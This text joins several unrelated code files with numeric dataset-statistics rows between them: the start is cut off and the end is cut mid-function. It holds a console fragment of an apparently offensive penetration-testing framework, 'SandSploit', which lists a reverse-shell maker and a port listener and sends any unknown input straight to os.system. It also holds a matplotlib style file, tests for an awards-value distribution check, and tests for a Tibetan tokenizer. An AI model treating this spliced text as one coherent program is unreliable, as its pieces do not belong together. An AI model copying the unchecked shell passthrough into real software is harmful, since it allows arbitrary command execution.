python Interactive Shell(Debuging Purposes)
RSMaker Make Reverse Shell For Desktop Operating Systems
run Run Tools In modules
use Interact With Different Parts of Penetration Testing Tools
version Show version of SandSploit
upgrade Full Upgrade Freamworks
update Update Exploits & Scripts Parts
exit Exit From SSF
''')
elif option == "version":
version()
elif option == "update":
update()
elif option == "upgrade":
upgrade()
elif option == "banner":
banner()
elif option == "RSMaker":
RSMaker()
elif option == "listener":
listener()
elif option == "exit":
sys.exit()
else:
os.system(option)
except EnvironmentError:
print ("\nUnknown Error......")
print ("Enter ""help"" to show commands....")
console()
def termux_console():
path = None
toolpart =None
#File lists Function
def mp(path):
for root,dirs,files in os.walk(path):
for f in files:
print (f)
#list Function
def list():
print ("\nTools\n===============")
mp(path)
try:
while True:
signal.signal(signal.SIGINT,controlc_signal)
#Get PWD
signal.signal(signal.SIGINT,controlc_signal)
getcwd = os.getcwd()
getdir = getcwd.split("/")
pwd = getdir[-1]
#Get LocalHost Name
plat = platform.node()
#Nothing Special :)
point = "→"
#Check Tools Part Directory
if path == None:
None
else:
pth = path.split("/")
toolpart = pth[-2]
#Promot
option = input (Fore.RESET+"\n[SSF@%s](%s){%s} %s "%(plat,pwd,toolpart,point))
option2 = option.split(" ")
#Conditions
if option2[0] == "cd":
def cd(path):
os.chdir(os.path.expanduser(path))
try:
cd(option2[1])
except:
print ("ERROR: No such file or directory: ",option2[1])
elif option2[0] == 'run':
try:
if option == "run":
print ("enter help to see how to use this command")
else:
run = option.split("run ")[1]
run2 = path+run
#exec(open(run2).read())
exst = os.path.isfile(run2)
if exst:
os.system(run2)
else :
print ("Cannot find executable file")
except:
print ("Error !!!")
elif option2[0] == 'use':
try:
check = "/data/data/com.termux/files/usr/opt/sandsploit/module/%s/"%option2[1]
exist = os.path.isdir(check)
if exist:
path = check
else:
print ("Part not Found")
except:
print ("Part Not Found")
elif option == 'list':
if path == None:
print("\nTools\n===============")
print ("Tools NotFound")
else:
list()
elif option == 'help':
#Menu
print ('''
Command Description
======== ============
banner Change Banner
bash Run Bash Shell
list List of tools for each section
listener Sniffing Port
python Interactive Shell(Debuging Purposes)
RSMaker Make Reverse Shell For Desktop Operating Systems
run Run Tools In modules
use Interact With Different Parts of Penetration Testing Tools
version Show version of SandSploit
exit Exit From SSF
''')
elif option == "version":
version()
elif option == "banner":
banner()
elif option == "RSMaker":
RSMaker()
elif option == "listener":
listener()
elif option == "exit":
sys.exit()
else:
os.system(option)
except EnvironmentError:
print ("\nUnknown Error......")
print ("Enter ""help"" to show commands....")
console()
| 31.90566 | 98 | 0.425429 | 755 | 8,455 | 4.75894 | 0.219868 | 0.044531 | 0.013359 | 0.026719 | 0.84442 | 0.84442 | 0.84442 | 0.84442 | 0.84442 | 0.84442 | 0 | 0.009987 | 0.467061 | 8,455 | 264 | 99 | 32.026515 | 0.786951 | 0.044944 | 0 | 0.888889 | 0 | 0.004831 | 0.227875 | 0.022375 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.05314 | 0 | 0.096618 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
65b91ff98a17de2d984aba71eb9e8f6694afc1ed | 420 | py | Python | demopy/notebooks/styles.py | omars-lab/demo-py | 08d656968ee330e607b100e58727b4503a5cde33 | [
"MIT"
] | null | null | null | demopy/notebooks/styles.py | omars-lab/demo-py | 08d656968ee330e607b100e58727b4503a5cde33 | [
"MIT"
] | null | null | null | demopy/notebooks/styles.py | omars-lab/demo-py | 08d656968ee330e607b100e58727b4503a5cde33 | [
"MIT"
] | null | null | null |
three_lines = (
[
dict(linewidth=5, color="lightgreen"),
dict(linewidth=3, linestyle="-.", color="gray"),
dict(linewidth=3, linestyle=":", color="blue")
]
)
four_lines = (
[
dict(linewidth=5, color="lightgreen"),
dict(linewidth=3, linestyle="-.", color="gray"),
dict(linewidth=3, linestyle=":", color="blue"),
dict(linewidth=5, color="red"),
]
)
| 23.333333 | 56 | 0.545238 | 43 | 420 | 5.27907 | 0.302326 | 0.400881 | 0.246696 | 0.405286 | 0.863436 | 0.863436 | 0.863436 | 0.863436 | 0.863436 | 0.863436 | 0 | 0.022152 | 0.247619 | 420 | 17 | 57 | 24.705882 | 0.696203 | 0 | 0 | 0.266667 | 0 | 0 | 0.107399 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
65c5bea0a1e6cfac3a8640f4966367cec255fec3 | 21,155 | py | Python | tests/dataset/distribution/test_awards_value.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | 1 | 2021-07-21T15:23:22.000Z | 2021-07-21T15:23:22.000Z | tests/dataset/distribution/test_awards_value.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | 40 | 2021-06-29T23:53:14.000Z | 2022-02-23T20:14:11.000Z | tests/dataset/distribution/test_awards_value.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | null | null | null | from dataset.distribution import value
from tools.currency_converter import bootstrap
bootstrap()
awards_value = value.ModuleType("awards.value")
item_unset1 = {"ocid": "1"}
item_unset2 = {"ocid": "2"}
def test_empty():
scope = {}
scope = awards_value.add_item(scope, item_unset1, 1)
scope = awards_value.add_item(scope, item_unset2, 2)
result = awards_value.get_result(scope)
assert type(result) == dict
assert result["result"] is None
assert result["value"] is None
assert result["meta"] == {"reason": "unsufficient amount of values (at least 100 required)"}
first = {
"ocid": "1",
"date": "2019-01-10T22:00:00+01:00",
"awards": [
{
"value": {
"amount": 10000000,
"currency": "EUR",
},
},
],
}
second = {
"ocid": "1",
"date": "2019-01-10T22:00:00+01:00",
"awards": [
{
"value": {
"amount": 1,
"currency": "USD",
},
},
],
}
def test_undefined():
scope = {}
scope = awards_value.add_item(scope, first, 1)
result = awards_value.get_result(scope)
assert type(result) == dict
assert result["result"] is None
assert result["value"] is None
assert result["meta"] == {"reason": "unsufficient amount of values (at least 100 required)"}
def test_failed():
scope = {}
scope = awards_value.add_item(scope, first, 1)
for i in range(2, 101):
scope = awards_value.add_item(scope, second, i)
result = awards_value.get_result(scope)
assert type(result) == dict
assert result["result"] is False
assert result["value"] == 0
assert result["meta"] == {
"counts": {
"0_1": 1,
"1_5": 4,
"20_50": 30,
"50_100": 50,
"5_20": 15,
},
"sums": {"0_1": 11507000, "1_5": 4, "20_50": 30, "50_100": 50, "5_20": 15},
"shares": {
"0_1": 11507000 / result["meta"]["sum"],
"1_5": 4 / result["meta"]["sum"],
"20_50": 30 / result["meta"]["sum"],
"50_100": 50 / result["meta"]["sum"],
"5_20": 15 / result["meta"]["sum"],
},
"examples": {
"0_1": [
{
"abs_amount": 11507000,
"item_id": 1,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 10000000, "currency": "EUR"},
}
],
"1_5": [
{
"abs_amount": 1,
"item_id": 2,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 3,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 4,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 5,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"5_20": [
{
"abs_amount": 1,
"item_id": 6,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 7,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 8,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 9,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 10,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 11,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 12,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 13,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 14,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 15,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"20_50": [
{
"abs_amount": 1,
"item_id": 21,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 22,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 23,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 24,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 25,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 26,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 27,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 28,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 29,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 30,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"50_100": [
{
"abs_amount": 1,
"item_id": 51,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 52,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 53,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 54,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 55,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 56,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 57,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 58,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 59,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 60,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
},
"sum": 11507099,
}
def test_ok():
scope = {}
for i in range(100):
scope = awards_value.add_item(scope, second, i + 1)
result = awards_value.get_result(scope)
assert type(result) == dict
assert result["result"] is True
assert result["value"] == 100
assert result["meta"] == {
"counts": {
"0_1": 1,
"1_5": 4,
"5_20": 15,
"20_50": 30,
"50_100": 50,
},
"sums": {"0_1": 1, "1_5": 4, "5_20": 15, "20_50": 30, "50_100": 50},
"shares": {
"0_1": 1 / result["meta"]["sum"],
"1_5": 4 / result["meta"]["sum"],
"5_20": 15 / result["meta"]["sum"],
"20_50": 30 / result["meta"]["sum"],
"50_100": 50 / result["meta"]["sum"],
},
"examples": {
"0_1": [
{
"abs_amount": 1,
"item_id": 1,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
}
],
"1_5": [
{
"abs_amount": 1,
"item_id": 2,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 3,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 4,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 5,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"5_20": [
{
"abs_amount": 1,
"item_id": 6,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 7,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 8,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 9,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 10,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 11,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 12,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 13,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 14,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 15,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"20_50": [
{
"abs_amount": 1,
"item_id": 21,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 22,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 23,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 24,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 25,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 26,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 27,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 28,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 29,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 30,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"50_100": [
{
"abs_amount": 1,
"item_id": 51,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 52,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 53,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 54,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 55,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 56,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 57,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 58,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 59,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 60,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
},
"sum": 100,
}
| 33.526149 | 96 | 0.287355 | 1,588 | 21,155 | 3.695844 | 0.066121 | 0.165786 | 0.143125 | 0.238541 | 0.937127 | 0.928438 | 0.928438 | 0.916681 | 0.898279 | 0.873573 | 0 | 0.072294 | 0.54753 | 21,155 | 630 | 97 | 33.579365 | 0.540848 | 0 | 0 | 0.690554 | 0 | 0 | 0.23758 | 0.002364 | 0 | 0 | 0 | 0 | 0.026059 | 1 | 0.006515 | false | 0 | 0.003257 | 0 | 0.009772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
65e981199822e894f271fb0a2ae5054059d1383c | 11,170 | py | Python | tests/tokenizers/test_bugs_missing_tokens.py | Esukhia/botok | 9009581cc290c800e7d93a405969e10a7c9d2f51 | [
"Apache-2.0"
] | 17 | 2019-10-19T15:29:52.000Z | 2022-03-01T19:43:15.000Z | tests/tokenizers/test_bugs_missing_tokens.py | drupchen/pybo | eac38e7c574e2e99a4f43ca641782d8616bb684d | [
"Apache-2.0"
] | 29 | 2019-09-01T21:33:15.000Z | 2022-01-11T08:57:50.000Z | tests/tokenizers/test_bugs_missing_tokens.py | Esukhia/botok | 9009581cc290c800e7d93a405969e10a7c9d2f51 | [
"Apache-2.0"
] | 8 | 2020-01-14T17:45:11.000Z | 2022-03-28T09:31:35.000Z | from botok import *
def test_missing_token1(wt):
input_str = "འཐུང་བུད་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཐུང་", "བུད་"]
def test_missing_token2(wt):
input_str = "ཨ་དྷྱིད་ཤུ་ཀ་ར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཨ་", "དྷྱིད་", "ཤུ་", "ཀ་ར་"]
def test_missing_token3(wt):
input_str = "ཀི་བི་ཏི་སྭཱ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཀི་", "བི་", "ཏི་", "སྭཱ་"]
def test_missing_token4(wt):
input_str = "ལང་ཏང་ཙེ་དང་བྱེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ལང་", "ཏང་", "ཙེ་", "དང་", "བྱེ་"]
def test_missing_token5(wt):
input_str = "ད་མེད་བྷ་གར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ད་", "མེད་", "བྷ་", "གར་"]
def test_missing_token6(wt):
input_str = "རབ་བསྐུས་ནས།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["རབ་", "བསྐུས་", "ནས", "།"]
def test_missing_token7(wt):
input_str = "གདབ། །ཨོཾ་ན་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གདབ", "། །", "ཨོཾ་", "ན་"]
def test_missing_token8(wt):
input_str = "བི་སི་ནི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བི་", "སི་", "ནི་"]
def test_missing_token9(wt):
input_str = "བསྐོལ། །རྡོ་རྗེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྐོལ", "། །", "རྡོ་རྗེ་"]
def test_missing_token10(wt):
input_str = "བསྐུས་ཤིང་མཉེས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྐུས་", "ཤིང་", "མཉེས་"]
def test_missing_token11(wt):
input_str = "སྦོམ་ཞིང་ཆེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["སྦོམ་", "ཞིང་", "ཆེ་"]
def test_missing_token12(wt):
input_str = "བྷ་ག་ཁ་ཆེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "ག་", "ཁ་ཆེ་"]
def test_missing_token13(wt):
input_str = "།ཨོཾ་གི་རི་ཧི་རི་ཙི་རི། །ཨཱ་ཨཱ་ཤུ་མ་ཤ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == [
"།",
"ཨོཾ་",
"གི་",
"རི་",
"ཧི་",
"རི་",
"ཙི་",
"རི",
"། །",
"ཨཱ་",
"ཨཱ་",
"ཤུ་",
"མ་",
"ཤ་",
]
def test_missing_token14(wt):
input_str = "བཟླས་བྱས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཟླས་", "བྱས་"]
def test_missing_token15(wt):
input_str = "བསྣམས། །རྩི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྣམས", "། །", "རྩི་"]
def test_missing_token16(wt):
input_str = "ནཱ་ཤ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ནཱ་", "ཤ་"]
def test_missing_token17(wt):
input_str = "གནོས་སྨྱོ་བྱེད་བརྗེད་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གནོས་", "སྨྱོ་", "བྱེད་", "བརྗེད་"]
def test_missing_token18(wt):
input_str = "གདོད་ཟིན་པ"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གདོད་", "ཟིན་པ"]
def test_missing_token19(wt):
input_str = "བསྲེས་དམར་ནག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྲེས་", "དམར་ནག་"]
def test_missing_token20(wt):
input_str = "བརྗེ་ཞིང་བསྐྱར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྗེ་", "ཞིང་", "བསྐྱར་"]
def test_missing_token21(wt):
input_str = "འཆང་མའི།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཆང་", "མའི", "།"]
def test_missing_token22(wt):
input_str = "དམོད་གཟུག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["དམོད་", "གཟུག་"]
def test_missing_token23(wt):
input_str = "བཤགས་ན་བུ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཤགས་", "ན་", "བུ་"]
def test_missing_token24(wt):
input_str = "མཐོལ་མགོ་ལ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["མཐོལ་", "མགོ་", "ལ་"]
def test_missing_token25(wt):
input_str = "ཧུ་ཧཾ།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཧུ་", "ཧཾ", "།"]
def test_missing_token26(wt):
input_str = "སྲི་མོ་བཛྲ་ནོ་ཏི་སྟ་ཀཱི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == [
"སྲི་",
"མོ་",
"བཛྲ་",
"ནོ་",
"ཏི་",
"སྟ་",
"ཀཱི་",
]
def test_missing_token27(wt):
input_str = "གུམ་དང་།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གུམ་", "དང་", "།"]
def test_missing_token28(wt):
input_str = "ཡོལ་གྱིས"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཡོལ་", "གྱིས"]
def test_missing_token29(wt):
input_str = "སྐུད་སྣ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["སྐུད་", "སྣ་"]
def test_missing_token30(wt):
input_str = "བཀྲ་མ།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཀྲ་", "མ", "།"]
def test_missing_token31(wt):
input_str = "གདོད་པར་བྱ"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གདོད་", "པར་", "བྱ"]
def test_missing_token32(wt):
input_str = "བསྒྲིབས་ཡོངས་སུ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྒྲིབས་", "ཡོངས་སུ་"]
def test_missing_token33(wt):
input_str = "དྲངས་ནས།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["དྲངས་", "ནས", "།"]
def test_missing_token34(wt):
input_str = "རཱུ་ཏྲ་ཀྵ་གནས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["རཱུ་", "ཏྲ་", "ཀྵ་", "གནས་"]
def test_missing_token35(wt):
input_str = "ལྡང་པ་ན།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ལྡང་པ་", "ན", "།"]
def test_missing_token36(wt):
input_str = "བསྲུབས་བྱས་པས། །ལྟེ་ལྐོག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྲུབས་", "བྱས་པས", "། །", "ལྟེ་", "ལྐོག་"]
def test_missing_token37(wt):
input_str = "བསྟུན་ལ་ཉམས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྟུན་", "ལ་", "ཉམས་"]
def test_missing_token38(wt):
input_str = "ཥ་ཡིག་རྣམ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཥ་", "ཡིག་", "རྣམ་"]
def test_missing_token39(wt):
input_str = "འཛོམ། །རྣོ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཛོམ", "། །", "རྣོ་"]
def test_missing_token40(wt):
input_str = "པྲི་ཡིག་དམར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["པྲི་", "ཡིག་", "དམར་"]
def test_missing_token41(wt):
input_str = "གཏུམ་བྱེད་དང་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གཏུམ་", "བྱེད་", "དང་"]
def test_missing_token42(wt):
input_str = "ཞིབ་བས་སྦལ།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཞིབ་", "བས་", "སྦལ", "།"]
def test_missing_token43(wt):
input_str = "གཅོད་འཁོར་ལོ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གཅོད་", "འཁོར་ལོ་"]
def test_missing_token44(wt):
input_str = "བཏུལ་མཚམས་བཅད་པ"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཏུལ་", "མཚམས་", "བཅད་པ"]
def test_missing_token45(wt):
input_str = "ཞལ་བྷ་ག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཞལ་", "བྷ་", "ག་"]
def test_missing_token46(wt):
input_str = "བསྐུར་ལས་ཀྱི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྐུར་", "ལས་", "ཀྱི་"]
def test_missing_token47(wt):
input_str = "འཁོས་དུ། །ཆེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཁོས་", "དུ", "། །", "ཆེ་"]
def test_missing_token48(wt):
input_str = "ནུ་ཧེ་རུ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ནུ་", "ཧེ་", "རུ་"]
def test_missing_token49(wt):
input_str = "བརྩེགས་རྣམ་པར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྩེགས་", "རྣམ་པར་"]
def test_missing_token50(wt):
input_str = "བྷ་གར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "གར་"]
def test_missing_token51(wt):
input_str = "ནུ་ཡེ་ཤེས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ནུ་", "ཡེ་ཤེས་"]
def test_missing_token52(wt):
input_str = "བརྩེགས་ངེས་པ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྩེགས་", "ངེས་པ་"]
def test_missing_token53(wt):
input_str = "བཟླས་བསྐུལ་གསུང་"
